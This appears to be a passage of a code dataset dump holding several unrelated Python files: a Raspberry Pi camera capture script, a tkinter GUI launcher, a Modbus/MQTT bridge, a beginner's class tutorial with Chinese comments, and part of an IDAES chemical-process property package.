{jk}')\n","repo_name":"SazidAF/CodeCartridge","sub_path":"Problems/python/banban.py","file_name":"banban.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73229527494","text":"from time import sleep\nfrom datetime import datetime\nfrom sh import gphoto2 as gp\nimport signal, os, subprocess\n\nsave_loc = \"/home/pi/Desktop/gphoto/Images/\" + datetime.now().strftime(\"%Y-%m-%d\")\n\ndef killgphoto2Process():\n p = subprocess.Popen(['ps', '-A'], stdout=subprocess.PIPE)\n out, err = p.communicate()\n \n for line in out.splitlines():\n if b'gvfsd-gphoto2' in line:\n pid = int(line.split(None, 1)[0])\n os.kill(pid, signal.SIGKILL)\n \ndef createSaveFolder():\n try:\n os.makedirs(save_loc)\n except:\n print(\"Folder already exists\")\n os.chdir(save_loc)\n \ndef captureImage():\n gp([\"--capture-image-and-download\"])\n \n \ndef renameFiles():\n for filename in os.listdir(\".\"):\n if len(filename) <20:\n if filename.endswith(\".jpg\"):\n os.rename(filename, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\".jpg\")\n \n ","repo_name":"JFriedrich29/Physical_Computing_Python","sub_path":"CameraHandler.py","file_name":"CameraHandler.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15542038336","text":"#|==============================================================|#\n# Made by IntSPstudio\n# Mafith\n# ID: 980004001\n#\n# Twitter: @IntSPstudio\n#|==============================================================|#\n\n#LIBRARIES\nfrom tkinter import Tk, Frame, Button, LEFT, BOTH, Entry, StringVar, Label, N, S, W, E, Text, FLAT, END\nimport calcproc\n#SETTINGS\n#MAIN\nroot = Tk()\nrootWidth =854 #X\nrootHeight =480 #Y\nrootSize = str(rootWidth) +\"x\"+ str(rootHeight)\nroot.geometry(rootSize)\nroot.title(\"Mafith\")\n#FRAMES\nframe1Width = int(rootWidth /5)\nframe1Height = rootHeight\nframe1Color = \"#181818\"\nframe2Width = rootWidth - frame1Width\nframe2Height = rootHeight\nframe2Color = \"#202020\"\nframeInputBoxColor =\"white\"\n#LABELS\ntitleLabelColor =\"#0080ff\"\n#CONTENT\ncontentTextComFont =\"arial\"\ncontentTextColor =\"white\"\n#BUTTONS\nbuttonBackground =\"black\"\n#INPUT\nfileNameMainText = StringVar()\nfileNameSecText = StringVar()\ncontentModeText = StringVar()\n#FUNCTION REQUEST\ndef buttonControl(buttonId):\n #IMPORT\n result = calcproc.rawUserFunctionRequest(fileNameMainInput.get(), fileNameSecInput.get(), contentModeInput.get(), buttonId)\n #EXPORT\n contentTextAdder(result)\ndef contentTextAdder(rawUserInput):\n contentBox.insert(\"1.0\",calcproc.returnCurrentDateTime(1) +\"| \"+ rawUserInput +\"\\n\")\n#START\nif __name__ == \"__main__\":\n #FRAMES\n f1 = Frame(root, width = frame1Width, height = frame1Height, bg = frame1Color, relief=\"flat\") #1\n f1.pack(fill=BOTH, expand=0, side=LEFT)\n f2 = Frame(root, width = frame2Width, height = frame2Height, bg = frame2Color, relief=\"flat\") #2\n f2.pack(fill=BOTH, expand=1, side=LEFT)\n #LABELS\n fileNameMainLabel = Label(f1, font=(contentTextComFont, 16), text= calcproc.lT61149, fg = titleLabelColor,bg = frame1Color) #1\n fileNameMainLabel.grid(row=1, column=0)\n fileNameSecLabel = Label(f1, font=(contentTextComFont, 16), text= calcproc.lT62150, fg = titleLabelColor,bg = frame1Color) #2\n fileNameSecLabel.grid(row=2, column=0)\n contentModeInputLabel = Label(f1, font=(contentTextComFont, 16), text= calcproc.lT135126, fg = titleLabelColor,bg = frame1Color) #3\n contentModeInputLabel.grid(row=3, column=0)\n buttonAreaALabel = Label(f1, font=(contentTextComFont, 11), text= calcproc.lT23150, fg = titleLabelColor,bg = frame1Color) #4\n buttonAreaALabel.grid(row=4, columnspan=2, sticky=W)\n #INPUT\n fileNameMainInput = Entry(f1, font=(contentTextComFont, 16), textvariable= fileNameMainText, bd=0, insertwidth=1, bg= frameInputBoxColor, justify=\"left\") #1\n fileNameMainInput.grid(row=1, column=1)\n fileNameSecInput = Entry(f1, font=(contentTextComFont, 16), textvariable= fileNameSecText, bd=0, insertwidth=1, bg= frameInputBoxColor, justify=\"left\") #2\n fileNameSecInput.grid(row=2, column=1)\n contentModeInput = Entry(f1, font=(contentTextComFont, 16), textvariable= contentModeText, bd=0, insertwidth=1, bg= frameInputBoxColor, justify=\"left\") #3\n contentModeInput.grid(row=3, column=1)\n #CONTENT\n contentBox = Text(f2, font=(contentTextComFont, 10),bd=0,bg=frame2Color, fg = contentTextColor) #1\n contentBox.pack(fill=BOTH, expand=1)\n #BUTTONS\n b219587 = Button(f1, text= calcproc.lB220730, command = lambda: buttonControl(calcproc.lBi24656), relief=FLAT, bg= buttonBackground, fg= contentTextColor) #1\n b219587.grid(row=5, columnspan=2, sticky=W)\n b25862 = Button(f1, text= calcproc.lB2201022, command = lambda: buttonControl(calcproc.lBi24950), relief=FLAT, bg= buttonBackground, fg= contentTextColor) #2\n b25862.grid(row=6, columnspan=2, sticky=W)\n b25969 = Button(f1, text= calcproc.lB2201116, command = lambda: buttonControl(calcproc.lBi241050), relief=FLAT, bg= buttonBackground, fg= contentTextColor) #3\n b25969.grid(row=7, columnspan=2, sticky=W)\n b35570 = Button(f1, text= calcproc.lB320662, command = lambda: buttonControl(calcproc.lBi34642), relief=FLAT, bg= buttonBackground, fg= contentTextColor) #4\n b35570.grid(row=8, columnspan=2, sticky=W)\n #COM\n root.mainloop()\n","repo_name":"IntSPstudio/python-mafith","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4580005714","text":"from pyModbusTCP.client import ModbusClient as pyModbus\nimport paho.mqtt.client as paho\nimport sys\nfrom pymongo import MongoClient\n\n################################################################################\n# DATABASE\n################################################################################\n\nmongo_host = \"mongo\"\nmongo_client = MongoClient(mongo_host)\ndb = mongo_client['gador']\ndevices = db['devices']\n\n\ndef getAddr(id):\n global devices\n d = devices.find_one({\"tag\": id})\n if d is None:\n return -1\n if 'modbus' in d:\n return int(d['modbus'])\n return -1\n\n\n################################################################################\n# MODBUS\n################################################################################\nslave = 'modbus-server'\nport = 5020\nmaster = pyModbus(host=slave, port=port,\n auto_open=True, auto_close=True)\n\n\ndef write_slave(addr, value):\n global master\n if master.write_single_register(addr, value):\n print('writing successful')\n else:\n print('writing error')\n\n################################################################################\n# MQTT\n################################################################################\n# msg.payload -> 'esp32,24'\n\n\ndef onMessage(client, userdata, msg):\n data = msg.payload.decode().split(\",\")\n addr = getAddr(data[0])\n if addr != -1:\n val = int(data[1])\n write_slave(addr, val)\n\n\nclient = paho.Client()\nclient.on_message = onMessage\nclient.username_pw_set('docker','container')\n\nif client.connect(\"mosquitto\", 1883, 60) != 0:\n print(\"Could not connect to MQTT Broker\")\n sys.exit(-1)\n\nclient.subscribe(\"data/#\")\n\ntry:\n print(\"Press CTRL+C to exit...\")\n client.loop_forever()\nexcept:\n print(\"Disconnecting from Broker\")\nclient.disconnect()\n","repo_name":"vacagonzalo/ceiot-nodos","sub_path":"holdingRegistersValidator/app/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8323942414","text":"import time #时间\nimport random #生成随机数\nimport pymysql #数据库\n\n# for i in range(10):\n# time.sleep(1) #停顿1秒\n# print(i)\n\n# a = random.randint(100,1000)\n\n# db = pymysql.connect(host=\"127.0.0.1\",user=\"root\",password=\"123456\",db=\"testdb\")\n# cur = db.cursor()\n# try:\n# cur.execute(\"select * from t_class;\")\n# res = cur.fetchall()\n# print(res)\n# except:\n# print(\"sql语句错误\")\n\n\"\"\"\n练习:\n定义一个方法,用来判断用户输入的账号密码是否符合规范\n\"\"\"\n# def checkname(username,password): #def方法声明,checkname方法名称,username方法参数\n# \"\"\"\n# 自动判断账号长度是否为5-7位,并且必须小写字母开头\n# \"\"\"\n# if len(username)>=5 and len(username)<=8:\n# if username[0] in \"qwertyuiopasdfghjklzxcvbnm\":\n# if len(password) >= 8 and len(password) <= 12:\n# return True\n# userlist = {\"username\":username,\"passwrod\":password}\n# else:\n# return \"密码必须8-12位\"\n# else:\n# return \"账号首字母必须为小写字母\" \n# else:\n# return \"账号长度不符合规范,请输入5-8位的账号\"\n\n#类\n\"\"\"\nclass 声明类的名字\n然后类的名字首字母必须大写\n面向对象编程\n类里面所有的方法,都必须要传一个参数:self\n\"\"\"\n\nclass GirlFriend():\n \"\"\"\n 女朋友\n \"\"\"\n def __init__(self,sex,high,weight,hair,age): #初始化\n self.sex = sex\n self.high = high\n self.weight = weight\n self.hair = hair\n self.age = age\n\n def talent(self,num):\n \"\"\"\n 才艺\n \"\"\"\n print(\"性别\"+self.sex+\"身高\"+self.high+\"体重\"+self.weight+\"发型\"+self.hair+\"年龄\"+self.age)\n if num == 1:\n print(\"胸口碎大石\")\n elif num ==2:\n print(\"唱跳RAP篮球\")\n else:\n print(\"单手开瓶盖\")\n\n def cooking(self):\n \"\"\"\n 厨艺\n \"\"\"\n print(\"精通八大菜系\")\n \n def work(self):\n \"\"\"\n 工作\n \"\"\"\n print(\"开挖掘机\")\n\n#类的实例化\n# zhangsan = GirlFriend()\n# zhangsan.talent(1)\n# zhangsan.work()\n# print(zhangsan.high)\n\n# class Car():\n# def __init__(self,brand,color,decorate,type):\n# self.brand = brand\n# self.color = color\n# self.decorate = decorate\n# self.type = type\n# def transform(self):\n# print(\"汽车变形金刚\")\n# def fly(self):\n# print(\"车子开始起飞\")\n\n# zhangsan = Car(\"五菱宏光\",\"灰色\",\"豪华\",\"面包车\")\n# zhangsan.transform()\n\nclass Nvpengyou(GirlFriend):\n def work(self):\n print(\"修电脑\")\n\nzhangsan = Nvpengyou(\"女\",\"170\",\"100\",\"短发\",\"24\")\nzhangsan.work()\n\n#GirlFriend:父类\n#Nvpengyou:子类\n#Object:祖类","repo_name":"liyichong00/zhangsan","sub_path":"demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6341934365","text":"import logging\n\n# Import Pyomo libraries\nfrom pyomo.environ import Constraint, Expression, log, NonNegativeReals,\\\n Var, Set, Param, sqrt, log10, units as pyunits\nfrom pyomo.opt import TerminationCondition\nfrom pyomo.util.calc_var_value import calculate_variable_from_constraint\n\n# Import IDAES cores\nfrom idaes.core import (declare_process_block_class,\n MaterialFlowBasis,\n PhysicalParameterBlock,\n StateBlockData,\n StateBlock,\n MaterialBalanceType,\n EnergyBalanceType,\n Component,\n LiquidPhase,\n VaporPhase)\nfrom idaes.core.util.constants import Constants as const\nfrom idaes.core.util.initialization import (fix_state_vars,\n revert_state_vars,\n solve_indexed_blocks)\nfrom idaes.core.util.misc import add_object_reference\nfrom idaes.core.util.model_statistics import degrees_of_freedom, \\\n number_unfixed_variables\nfrom idaes.core.util.misc import extract_data\nfrom idaes.core.solvers import get_solver\nimport idaes.core.util.scaling as iscale\nimport idaes.logger as idaeslog\n\n# Set up logger\n_log = idaeslog.getLogger(__name__)\n\n\n@declare_process_block_class(\"HDAParameterBlock\")\nclass HDAParameterData(PhysicalParameterBlock):\n CONFIG = PhysicalParameterBlock.CONFIG()\n\n def build(self):\n '''\n Callable method for Block construction.\n '''\n super(HDAParameterData, self).build()\n\n self._state_block_class = IdealStateBlock\n\n self.benzene = Component()\n self.toluene = Component()\n self.methane = Component()\n self.hydrogen = Component()\n\n self.Liq = LiquidPhase()\n self.Vap = VaporPhase()\n\n # List of components in each phase (optional)\n self.phase_comp = {\"Liq\": self.component_list,\n \"Vap\": self.component_list}\n\n # List of phase equilibrium index\n self.phase_equilibrium_idx = Set(initialize=[1, 2, 3, 4])\n\n self.phase_equilibrium_list = \\\n {1: [\"benzene\", (\"Vap\", \"Liq\")],\n 2: [\"toluene\", (\"Vap\", \"Liq\")],\n 3: [\"hydrogen\", (\"Vap\", \"Liq\")],\n 4: [\"methane\", (\"Vap\", \"Liq\")]}\n\n # Thermodynamic reference state\n self.pressure_ref = Param(mutable=True,\n default=101325,\n units=pyunits.Pa,\n doc='Reference pressure')\n self.temperature_ref = Param(mutable=True,\n default=298.15,\n units=pyunits.K,\n doc='Reference temperature')\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n pressure_crit_data = {'benzene': 48.9e5,\n 'toluene': 41e5,\n 'hydrogen': 12.9e5,\n 'methane': 46e5\n }\n\n self.pressure_crit = Param(\n self.component_list,\n within=NonNegativeReals,\n mutable=False,\n units=pyunits.Pa,\n initialize=extract_data(pressure_crit_data),\n doc='Critical pressure')\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n temperature_crit_data = {'benzene': 562.2,\n 'toluene': 591.8,\n 'hydrogen': 33.0,\n 'methane': 190.4\n }\n\n self.temperature_crit = Param(\n self.component_list,\n within=NonNegativeReals,\n mutable=False,\n units=pyunits.K,\n initialize=extract_data(temperature_crit_data),\n doc='Critical temperature')\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n mw_comp_data = {'benzene': 78.1136E-3,\n 'toluene': 92.1405E-3,\n 'hydrogen': 2.016e-3,\n 'methane': 16.043e-3}\n\n self.mw_comp = Param(self.component_list,\n mutable=False,\n units=pyunits.kg/pyunits.mol,\n initialize=extract_data(mw_comp_data),\n doc=\"molecular weight\")\n\n # Constants for liquid densities\n # Source: Perry's Chemical Engineers Handbook\n # - Robert H. Perry (Cp_liq)\n dens_liq_data = {('benzene', '1'): 1.0162,\n ('benzene', '2'): 0.2655,\n ('benzene', '3'): 562.16,\n ('benzene', '4'): 0.28212,\n ('toluene', '1'): 0.8488,\n ('toluene', '2'): 0.26655,\n ('toluene', '3'): 591.8,\n ('toluene', '4'): 0.2878,\n ('hydrogen', '1'): 5.414,\n ('hydrogen', '2'): 0.34893,\n ('hydrogen', '3'): 33.19,\n ('hydrogen', '4'): 0.2706,\n ('methane', '1'): 2.9214,\n ('methane', '2'): 0.28976,\n ('methane', '3'): 190.56,\n ('methane', '4'): 0.28881}\n\n self.dens_liq_param_1 = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in dens_liq_data.items() if j == '1'},\n doc=\"Parameter 1 to compute liquid densities\",\n units=pyunits.kmol*pyunits.m**-3\n )\n\n self.dens_liq_param_2 = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in dens_liq_data.items() if j == '2'},\n doc=\"Parameter 2 to compute liquid densities\",\n units=pyunits.dimensionless\n )\n\n self.dens_liq_param_3 = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in dens_liq_data.items() if j == '3'},\n doc=\"Parameter 3 to compute liquid densities\",\n units=pyunits.K\n )\n\n self.dens_liq_param_4 = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in dens_liq_data.items() if j == '4'},\n doc=\"Parameter 4 to compute liquid densities\",\n units=pyunits.dimensionless\n )\n\n # Boiling point at standard pressure\n # Source: Perry's Chemical Engineers Handbook\n # - Robert H. Perry (Cp_liq)\n bp_data = {('benzene'): 353.25,\n ('toluene'): 383.95,\n ('hydrogen'): 20.45,\n ('methane'): 111.75}\n\n self.temperature_boil = Param(\n self.component_list,\n mutable=False,\n units=pyunits.K,\n initialize=extract_data(bp_data),\n doc=\"Pure component boiling points at standard pressure\")\n\n # Constants for specific heat capacity, enthalpy\n # Sources: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n # Perry's Chemical Engineers Handbook\n # - Robert H. Perry (Cp_liq)\n cp_ig_data = {('Liq', 'benzene', '1'): 1.29E5,\n ('Liq', 'benzene', '2'): -1.7E2,\n ('Liq', 'benzene', '3'): 6.48E-1,\n ('Liq', 'benzene', '4'): 0,\n ('Liq', 'benzene', '5'): 0,\n ('Vap', 'benzene', '1'): -3.392E1,\n ('Vap', 'benzene', '2'): 4.739E-1,\n ('Vap', 'benzene', '3'): -3.017E-4,\n ('Vap', 'benzene', '4'): 7.130E-8,\n ('Vap', 'benzene', '5'): 0,\n ('Liq', 'toluene', '1'): 1.40E5,\n ('Liq', 'toluene', '2'): -1.52E2,\n ('Liq', 'toluene', '3'): 6.95E-1,\n ('Liq', 'toluene', '4'): 0,\n ('Liq', 'toluene', '5'): 0,\n ('Vap', 'toluene', '1'): -2.435E1,\n ('Vap', 'toluene', '2'): 5.125E-1,\n ('Vap', 'toluene', '3'): -2.765E-4,\n ('Vap', 'toluene', '4'): 4.911E-8,\n ('Vap', 'toluene', '5'): 0,\n ('Liq', 'hydrogen', '1'): 0, # 6.6653e1,\n ('Liq', 'hydrogen', '2'): 0, # 6.7659e3,\n ('Liq', 'hydrogen', '3'): 0, # -1.2363e2,\n ('Liq', 'hydrogen', '4'): 0, # 4.7827e2, # Eqn 2\n ('Liq', 'hydrogen', '5'): 0,\n ('Vap', 'hydrogen', '1'): 2.714e1,\n ('Vap', 'hydrogen', '2'): 9.274e-3,\n ('Vap', 'hydrogen', '3'): -1.381e-5,\n ('Vap', 'hydrogen', '4'): 7.645e-9,\n ('Vap', 'hydrogen', '5'): 0,\n ('Liq', 'methane', '1'): 0, # 6.5708e1,\n ('Liq', 'methane', '2'): 0, # 3.8883e4,\n ('Liq', 'methane', '3'): 0, # -2.5795e2,\n ('Liq', 'methane', '4'): 0, # 6.1407e2, # Eqn 2\n ('Liq', 'methane', '5'): 0,\n ('Vap', 'methane', '1'): 1.925e1,\n ('Vap', 'methane', '2'): 5.213e-2,\n ('Vap', 'methane', '3'): 1.197e-5,\n ('Vap', 'methane', '4'): -1.132e-8,\n ('Vap', 'methane', '5'): 0}\n\n self.cp_ig_1 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '1'},\n doc=\"Parameter 1 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K\n )\n\n self.cp_ig_2 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '2'},\n doc=\"Parameter 2 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K**2\n )\n\n self.cp_ig_3 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '3'},\n doc=\"Parameter 3 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K**3\n )\n\n self.cp_ig_4 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '4'},\n doc=\"Parameter 4 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K**4\n )\n\n self.cp_ig_5 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '5'},\n doc=\"Parameter 5 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K**5\n )\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n # fitted to Antoine form\n # H2, Methane from NIST webbook\n pressure_sat_coeff_data = {('benzene', 'A'): 4.202,\n ('benzene', 'B'): 1322,\n ('benzene', 'C'): -38.56,\n ('toluene', 'A'): 4.216,\n ('toluene', 'B'): 1435,\n ('toluene', 'C'): -43.33,\n ('hydrogen', 'A'): 3.543,\n ('hydrogen', 'B'): 99.40,\n ('hydrogen', 'C'): 7.726,\n ('methane', 'A'): 3.990,\n ('methane', 'B'): 443.0,\n ('methane', 'C'): -0.49}\n\n self.pressure_sat_coeff_A = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in pressure_sat_coeff_data.items() if j == 'A'},\n doc=\"Parameter A to compute saturated pressure\",\n units=pyunits.dimensionless\n )\n\n self.pressure_sat_coeff_B = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in pressure_sat_coeff_data.items() if j == 'B'},\n doc=\"Parameter B to compute saturated pressure\",\n units=pyunits.K\n )\n\n self.pressure_sat_coeff_C = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in pressure_sat_coeff_data.items() if j == 'C'},\n doc=\"Parameter C to compute saturated pressure\",\n units=pyunits.K\n )\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n dh_vap = {'benzene': 3.387e4,\n 'toluene': 3.8262e4,\n 'hydrogen': 0,\n 'methane': 0}\n\n self.dh_vap = Param(self.component_list,\n mutable=False,\n units=pyunits.J/pyunits.mol,\n initialize=extract_data(dh_vap),\n doc=\"heat of vaporization\")\n\n # Set default scaling factors\n self.set_default_scaling(\"flow_mol\", 1e3)\n self.set_default_scaling(\"flow_mol_phase_comp\", 1e3)\n self.set_default_scaling(\"flow_mol_phase\", 1e3)\n self.set_default_scaling(\"material_flow_terms\", 1e3)\n self.set_default_scaling(\"enthalpy_flow_terms\", 1e-2)\n self.set_default_scaling(\"mole_frac_comp\", 1e1)\n self.set_default_scaling(\"temperature\", 1e-2)\n self.set_default_scaling(\"temperature_dew\", 1e-2)\n self.set_default_scaling(\"temperature_bubble\", 1e-2)\n self.set_default_scaling(\"pressure\", 1e-5)\n self.set_default_scaling(\"pressure_sat\", 1e-5)\n self.set_default_scaling(\"pressure_dew\", 1e-5)\n self.set_default_scaling(\"pressure_bubble\", 1e-5)\n self.set_default_scaling(\"mole_frac_phase_comp\", 1e1)\n self.set_default_scaling(\"enth_mol_phase\", 1e-3, index=\"Liq\")\n self.set_default_scaling(\"enth_mol_phase\", 1e-4, index=\"Vap\")\n self.set_default_scaling(\"enth_mol\", 1e-3)\n self.set_default_scaling(\"entr_mol_phase\", 1e-2)\n self.set_default_scaling(\"entr_mol\", 1e-2)\n\n @classmethod\n def define_metadata(cls, obj):\n \"\"\"Define properties supported and units.\"\"\"\n obj.add_properties(\n {'flow_mol': {'method': None},\n 'flow_mol_phase_comp': {'method': None},\n 'mole_frac_comp': {'method': None},\n 'temperature': {'method': None},\n 'pressure': {'method': None},\n 'flow_mol_phase': {'method': None},\n 'dens_mol_phase': {'method': '_dens_mol_phase'},\n 'pressure_sat': {'method': '_pressure_sat'},\n 'mole_frac_phase_comp': {'method': '_mole_frac_phase'},\n 'energy_internal_mol_phase_comp': {\n 'method': '_energy_internal_mol_phase_comp'},\n 'energy_internal_mol_phase': {\n 'method': '_energy_internal_mol_phase'},\n 'enth_mol_phase_comp': {'method': '_enth_mol_phase_comp'},\n 'enth_mol_phase': {'method': '_enth_mol_phase'},\n 'entr_mol_phase_comp': {'method': '_entr_mol_phase_comp'},\n 'entr_mol_phase': {'method': '_entr_mol_phase'},\n 'temperature_bubble': {'method': '_temperature_bubble'},\n 'temperature_dew': {'method': '_temperature_dew'},\n 'pressure_bubble': {'method': '_pressure_bubble'},\n 'pressure_dew': {'method': '_pressure_dew'},\n 'fug_vap_comp': {'method': '_fug_vap_comp'},\n 'fug_liq_comp': {'method': '_fug_liq_comp'},\n })\n\n obj.define_custom_properties(\n {'dh_vap': {'method': '_dh_vap', \"units\": obj.derived_units.ENERGY_MOLE},\n 'ds_vap': {'method': '_ds_vap', \"units\": obj.derived_units.ENERGY_MASS}})\n \n obj.add_default_units({'time': pyunits.s,\n 'length': pyunits.m,\n 'mass': pyunits.kg,\n 'amount': pyunits.mol,\n 'temperature': pyunits.K})\n\n\nclass _IdealStateBlock(StateBlock):\n \"\"\"\n This Class contains methods which should be applied to Property Blocks as a\n whole, rather than individual elements of indexed Property Blocks.\n \"\"\"\n\n def initialize(blk, state_args={}, state_vars_fixed=False,\n hold_state=False, outlvl=idaeslog.NOTSET,\n solver=None, optarg=None):\n \"\"\"\n Initialization routine for property package.\n Keyword Arguments:\n state_args : Dictionary with initial guesses for the state vars\n chosen. Note that if this method is triggered\n through the control volume, and if initial guesses\n were not provied at the unit model level, the\n control volume passes the inlet values as initial\n guess.The keys for the state_args dictionary are:\n\n flow_mol_phase_comp : value at which to initialize\n phase component flows\n pressure : value at which to initialize pressure\n temperature : value at which to initialize temperature\n outlvl : sets output level of initialization routine\n * 0 = no output (default)\n * 1 = return solver state for each step in routine\n * 2 = include solver output infomation (tee=True)\n optarg : solver options dictionary object (default=None)\n state_vars_fixed: Flag to denote if state vars have already been\n fixed.\n - True - states have already been fixed by the\n control volume 1D. Control volume 0D\n does not fix the state vars, so will\n be False if this state block is used\n with 0D blocks.\n - False - states have not been fixed. The state\n block will deal with fixing/unfixing.\n solver : str indicating whcih solver to use during\n initialization (default = 'ipopt')\n hold_state : flag indicating whether the initialization routine\n should unfix any state variables fixed during\n initialization (default=False).\n - True - states varaibles are not unfixed, and\n a dict of returned containing flags for\n which states were fixed during\n initialization.\n - False - state variables are unfixed after\n initialization by calling the\n relase_state method\n Returns:\n If hold_states is True, returns a dict containing flags for\n which states were fixed during initialization.\n \"\"\"\n\n init_log = idaeslog.getInitLogger(blk.name, outlvl, tag=\"properties\")\n solve_log = idaeslog.getSolveLogger(blk.name, outlvl, tag=\"properties\")\n\n # Fix state variables if not already fixed\n if state_vars_fixed is False:\n flags = fix_state_vars(blk, state_args)\n\n else:\n # Check when the state vars are fixed already result in dof 0\n for k in blk.keys():\n if degrees_of_freedom(blk[k]) != 0:\n raise Exception(\"State vars fixed but degrees of freedom \"\n \"for state block is not zero during \"\n \"initialization.\")\n # Set solver\n opt = get_solver(solver, optarg)\n\n # ---------------------------------------------------------------------\n # If present, initialize bubble and dew point calculations\n for k in blk.keys():\n if hasattr(blk[k], \"eq_temperature_dew\"):\n calculate_variable_from_constraint(blk[k].temperature_dew,\n blk[k].eq_temperature_dew)\n\n if hasattr(blk[k], \"eq_pressure_dew\"):\n calculate_variable_from_constraint(blk[k].pressure_dew,\n blk[k].eq_pressure_dew)\n\n init_log.info_high(\"Initialization Step 1 - Dew and bubble points \"\n \"calculation completed.\")\n\n # ---------------------------------------------------------------------\n # If flash, initialize T1 and Teq\n for k in blk.keys():\n if (blk[k].config.has_phase_equilibrium and\n not blk[k].config.defined_state):\n blk[k]._t1.value = max(blk[k].temperature.value,\n blk[k].temperature_bubble.value)\n blk[k]._teq.value = min(blk[k]._t1.value,\n blk[k].temperature_dew.value)\n\n init_log.info_high(\"Initialization Step 2 - Equilibrium temperature \"\n \" calculation completed.\")\n\n # ---------------------------------------------------------------------\n # Initialize flow rates and compositions\n # TODO : This will need to be generalised more when we move to a\n # modular implementation\n for k in blk.keys():\n # Deactivate equilibrium constraints, as state is fixed\n if hasattr(blk[k], 'equilibrium_constraint'):\n blk[k].equilibrium_constraint.deactivate()\n\n free_vars = 0\n for k in blk.keys():\n free_vars += number_unfixed_variables(blk[k])\n if free_vars > 0:\n try:\n with idaeslog.solver_log(solve_log, idaeslog.DEBUG) as slc:\n res = solve_indexed_blocks(opt, [blk], tee=slc.tee)\n except:\n res = None\n else:\n res = None\n\n for k in blk.keys():\n # Reactivate equilibrium constraints\n if hasattr(blk[k], 'equilibrium_constraint'):\n blk[k].equilibrium_constraint.activate()\n\n # ---------------------------------------------------------------------\n # Return state to initial conditions\n if state_vars_fixed is False:\n if hold_state is True:\n return flags\n else:\n blk.release_state(flags)\n\n init_log.info(\"Initialization Complete\")\n\n def release_state(blk, flags, outlvl=0):\n '''\n Method to relase state variables fixed during initialization.\n Keyword Arguments:\n flags : dict containing information of which state variables\n were fixed during initialization, and should now be\n unfixed. This dict is returned by initialize if\n hold_state=True.\n outlvl : sets output level of of logging\n '''\n init_log = idaeslog.getInitLogger(blk.name, outlvl, tag=\"properties\")\n if flags is None:\n init_log.debug(\"No flags passed to release_state().\")\n return\n\n # Unfix state variables\n revert_state_vars(blk, flags)\n\n init_log.info_high(\"State Released.\")\n\n\n@declare_process_block_class(\"IdealStateBlock\",\n block_class=_IdealStateBlock)\nclass IdealStateBlockData(StateBlockData):\n \"\"\"An example property package for ideal VLE.\"\"\"\n\n def build(self):\n \"\"\"Callable method for Block construction.\"\"\"\n super(IdealStateBlockData, self).build()\n\n # Add state variables\n self.flow_mol_phase_comp = Var(\n self._params.phase_list,\n self._params.component_list,\n initialize=0.5,\n units=pyunits.mol/pyunits.s,\n bounds=(1e-12, 100),\n doc='Phase-component molar flow rates')\n\n self.pressure = Var(initialize=101325,\n bounds=(100000, 1000000),\n units=pyunits.Pa,\n domain=NonNegativeReals,\n doc='State pressure')\n self.temperature = Var(initialize=298.15,\n units=pyunits.K,\n bounds=(298, 1000),\n domain=NonNegativeReals,\n doc='State temperature')\n\n # Add supporting variables\n def flow_mol_phase(b, p):\n return sum(b.flow_mol_phase_comp[p, j]\n for j in b._params.component_list)\n self.flow_mol_phase = Expression(self._params.phase_list,\n rule=flow_mol_phase,\n doc='Phase molar flow rates')\n\n def flow_mol(b):\n return sum(b.flow_mol_phase_comp[p, j]\n for j in b._params.component_list\n for p in b._params.phase_list)\n self.flow_mol = Expression(rule=flow_mol,\n doc='Total molar flowrate')\n\n def mole_frac_phase_comp(b, p, j):\n return b.flow_mol_phase_comp[p, j]/b.flow_mol_phase[p]\n self.mole_frac_phase_comp = Expression(\n self._params.phase_list,\n self._params.component_list,\n rule=mole_frac_phase_comp,\n doc='Phase mole fractions')\n\n def mole_frac_comp(b, j):\n return (sum(b.flow_mol_phase_comp[p, j]\n for p in 